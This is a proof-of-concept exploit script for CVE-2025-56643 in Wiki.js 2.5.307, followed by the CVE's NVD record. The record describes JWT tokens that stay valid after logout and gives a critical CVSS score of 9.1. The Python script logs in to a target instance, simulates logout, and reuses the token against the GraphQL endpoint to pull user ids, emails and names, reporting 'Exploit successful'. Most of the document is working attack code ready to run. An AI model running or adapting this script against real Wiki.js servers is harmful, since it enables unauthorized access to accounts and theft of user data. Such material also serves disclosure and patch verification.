CVE-2025-56643

import requests import json # Target Wiki.js instance TARGET_URL = "http://target-server:3000" # Step 1: Normal login to get JWT token login_url = f"{TARGET_URL}/login" login_data = { "email": "[email protected]", "password": "password123" } response = requests.post(login_url, json=login_data) if response.status_code == 200: jwt_token = response.json().get("token") print(f"[+] Obtained JWT token: {jwt_token}") else: print("[-] Login failed") exit(1) # Step 2: User logs out (token remains valid) # Simulating logout - token is not invalidated on server side print("[*] Target user logs out...") # Step 3: Use the same token after logout (exploit) graphql_url = f"{TARGET_URL}/graphql" headers = { "Authorization": f"Bearer {jwt_token}", "Content-Type": "application/json" } # GraphQL query to verify token still works query = { "query": "{ users { id email name } }"} response = requests.post(graphql_url, headers=headers, json=query) if response.status_code == 200: result = response.json() if "data" in result: print(f"[+] Exploit successful! Token still valid after logout") print(f"[+] Retrieved user data: {json.dumps(result, indent=2)}") else: print(f"[-] Unexpected response: {result}") else: print(f"[-] Request failed with status: {response.status_code}")

{"cve": {"id": "CVE-2025-56643", "sourceIdentifier": "[email protected]", "published": "2025-11-18T18:16:07.647", "lastModified": "2025-12-31T02:06:51.750", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Requarks Wiki.js 2.5.307 does not properly revoke or invalidate active JWT tokens when a user logs out. As a result, previously issued tokens remain valid and can be reused to access the system, even after logout. This behavior affects session integrity and may allow unauthorized access if a token is compromised. The issue is present in the authentication resolver logic and affects both the GraphQL endpoint and the logout mechanism."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:requarks:wiki.js:2.5.307:*:*:*:*:*:*:*", "matchCriteriaId": "9B79896A-E767-4CFF-A485-4F1332AA5AF1"}]}]}], "references": [{"url": "https://github.com/0xBS0D27/CVE-2025-56643", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}